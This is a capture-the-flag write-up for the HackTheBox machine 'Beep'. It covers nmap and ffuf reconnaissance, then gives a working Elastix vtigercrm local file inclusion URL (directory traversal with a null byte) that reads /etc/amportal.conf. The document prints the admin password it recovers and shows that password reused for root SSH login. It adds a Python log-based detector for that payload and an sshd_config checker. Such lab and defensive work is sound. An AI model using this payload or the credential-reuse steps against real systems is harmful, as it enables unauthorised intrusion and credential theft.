HackTheBox - Beep

Updated 29-03-2026

An older Linux machine running a heavily-featured VoIP platform — a well-known local file inclusion vulnerability exposes a configuration file, and the credentials inside turn out to open more doors than expected.

Recon

Nmap

$ ip=10.129.229.183; ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); nmap -p$ports -sC -sV $ip
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-29 03:25 -0400
Nmap scan report for 10.129.229.183
Host is up (0.43s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http Apache httpd 2.2.3
|_http-title: Did not follow redirect to https://10.129.229.183/
|_http-server-header: Apache/2.2.3 (CentOS)
110/tcp open pop3?
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 853/udp status
|_ 100024 1 856/tcp status
143/tcp open imap?
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
|_http-title: Elastix - Login page
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after: 2018-04-07T08:22:08
|_http-server-header: Apache/2.2.3 (CentOS)
| http-robots.txt: 1 disallowed entry
|_/
|_ssl-date: 2026-03-29T07:30:05+00:00; -52s from scanner time.
856/tcp open status 1 (RPC #100024)
993/tcp open imaps?
995/tcp open pop3s?
3306/tcp open mysql?
4190/tcp open sieve?
4445/tcp open upnotifyp?
4559/tcp open hylafax?
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Host: 127.0.0.1

Host script results:
|_clock-skew: -52s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 593.53 seconds

The scan reveals a heavily-featured VoIP stack. Key services:

  • 443/tcp — Apache serving an Elastix login page
  • 5038/tcp — Asterisk Call Manager 1.1
  • 10000/tcp — Webmin 1.570
  • 25/tcp, 110/tcp, 143/tcp, 993/tcp, 995/tcp — mail services (SMTP, POP3, IMAP and their SSL variants)

Foothold

TLS Version Fix

Navigating to https://10.129.229.183/ returns SSL_ERROR_UNSUPPORTED_VERSION — the server uses an outdated TLS version that modern browsers reject by default. Fix this in Firefox by going to about:config and setting security.tls.version.min to 1.

Directory Enumeration

$ ffuf -c -u https://10.129.229.183/FUZZ -w /usr/share/wordlists/dirb/common.txt 

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : https://10.129.229.183/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

[Status: 200, Size: 1785, Words: 103, Lines: 35, Duration: 289ms]
.hta [Status: 403, Size: 286, Words: 21, Lines: 11, Duration: 297ms]
.htaccess [Status: 403, Size: 291, Words: 21, Lines: 11, Duration: 285ms]
.htpasswd [Status: 403, Size: 291, Words: 21, Lines: 11, Duration: 186ms]
admin [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 189ms]
cgi-bin/ [Status: 403, Size: 290, Words: 21, Lines: 11, Duration: 183ms]
configs [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 182ms]
favicon.ico [Status: 200, Size: 894, Words: 6, Lines: 1, Duration: 192ms]
help [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 192ms]
images [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 186ms]
index.php [Status: 200, Size: 1785, Words: 103, Lines: 35, Duration: 213ms]
lang [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 192ms]
libs [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 185ms]
mail [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 201ms]
modules [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 197ms]
panel [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 177ms]
robots.txt [Status: 200, Size: 28, Words: 3, Lines: 3, Duration: 180ms]
static [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 232ms]
themes [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 226ms]
var [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 197ms]
:: Progress: [4614/4614] :: Job [1/1] :: 50 req/sec :: Duration: [0:01:32] :: Errors: 0 ::

Nothing immediately useful, but the Elastix version running is known to be vulnerable to LFI.

Elastix LFI — Credential Extraction

This version of Elastix is vulnerable to a local file inclusion in the vtigercrm module. The following URL reads /etc/amportal.conf — the FreePBX/Asterisk configuration file — which contains plaintext credentials:

https://10.129.229.183/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

The file yields the admin password: jEhdIekWmdjE.

Logging in to the Elastix web panel with admin:jEhdIekWmdjE succeeds but provides nothing further of use.
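
On the defender's side, the request above leaves a distinctive trace in the Apache access log: a traversal sequence and a %00 null byte in the current_language parameter of graph.php. The following Python detector is an added example, not part of the original write-up or of Elastix; the log lines are constructed and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache common/combined log prefix: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# A ".." path segment delimited by / or \ (or by the ends of the value).
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e%252e) is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return one finding per suspicious query parameter in an access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    findings = []
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        value = fully_decode(value)
        reasons = []
        if TRAVERSAL_RE.search(value):
            reasons.append("traversal")
        if "\x00" in value:
            reasons.append("null-byte")
        if reasons:
            # "served" marks a 200 response, i.e. the include probably returned content.
            findings.append({"ip": m["ip"], "path": url.path, "param": name,
                             "reasons": reasons, "served": m["status"] == "200"})
    return findings

def scan(lines):
    return [finding for line in lines for finding in inspect_line(line)]

# Constructed sample lines (documentation-range client addresses), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Mar/2026:07:31:02 +0000] "GET /index.php HTTP/1.1" 200 1785',
    '192.0.2.10 - - [29/Mar/2026:07:31:09 +0000] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts HTTP/1.1" 200 512',
    '198.51.100.7 - - [29/Mar/2026:07:32:40 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 13779',
    '198.51.100.7 - - [29/Mar/2026:07:32:55 +0000] "GET /vtigercrm/graph.php?current_language=%252e%252e%252f%252e%252e%252fetc%252famportal.conf%2500 HTTP/1.1" 404 286',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with served set to true means the server answered 200 to the traversal request, so every credential in the included file should be treated as exposed and rotated.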


Privilege Escalation

Password Reuse — Direct Root SSH

The password jEhdIekWmdjE is reused for the root system account. Since the server runs a very old OpenSSH version, the legacy key exchange and host key algorithms it offers must be enabled explicitly on the client:

$ ssh \
-oKexAlgorithms=+diffie-hellman-group14-sha1 \
-oHostKeyAlgorithms=+ssh-rsa \
root@10.129.18.239
The authenticity of host '10.129.18.239 (10.129.18.239)' can't be established.
RSA key fingerprint is: SHA256:Ip2MswIVDX1AIEPoLiHsMFfdg1pEJ0XXD5nFEjki/hI
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.18.239' (RSA) to the list of known hosts.
root@10.129.18.239's password:
Last login: Wed Nov 15 12:55:38 2023

Welcome to Elastix
----------------------------------------------------

To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.129.18.239

[root@beep ~]#

Logged in directly as root. Both the user and root flags are accessible.
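
The reused password only becomes a root shell because sshd accepts password logins for root. The following Python check is an added example, not part of the original write-up: it reads sshd_config text the way sshd does (the first value seen for a keyword wins, commented lines do not apply) and reports whether root password login is allowed. The sample configurations are constructed, the function names are hypothetical, and the defaults are an assumption for a legacy OpenSSH build.

```python
import re

# Assumed defaults for a legacy OpenSSH build such as the 4.3 server in the scan;
# OpenSSH 7.0 and later default PermitRootLogin to prohibit-password instead.
LEGACY_DEFAULTS = {"permitrootlogin": "yes", "passwordauthentication": "yes"}

def global_options(config_text):
    """Global sshd_config keywords; sshd keeps the first value it reads for each."""
    options = {}
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                      # commented-out settings do not apply
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        keyword = parts[0].lower()        # keywords are case-insensitive
        if keyword == "match":            # conditional blocks are not global settings
            break
        value = parts[1].strip().lower() if len(parts) > 1 else ""
        options.setdefault(keyword, value)
    return options

def root_password_login_allowed(config_text, defaults=LEGACY_DEFAULTS):
    """True when the global settings let root authenticate with a password."""
    opts = {**defaults, **global_options(config_text)}
    return opts["permitrootlogin"] == "yes" and opts["passwordauthentication"] == "yes"

# Constructed sample configurations, not taken from the target machine.
# WEAK: the commented "no" is ignored and the later "no" loses to the earlier "yes".
WEAK = """\
#PermitRootLogin no
PermitRootLogin yes
PermitRootLogin no
PasswordAuthentication yes
"""
# HARDENED uses keyword values from current OpenSSH releases.
HARDENED = """\
PermitRootLogin prohibit-password
PasswordAuthentication no
PubkeyAuthentication yes
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, "root password login allowed:", root_password_login_allowed(text))
```

Keyboard-interactive authentication through PAM can also accept passwords; this check covers only the two keywords shown.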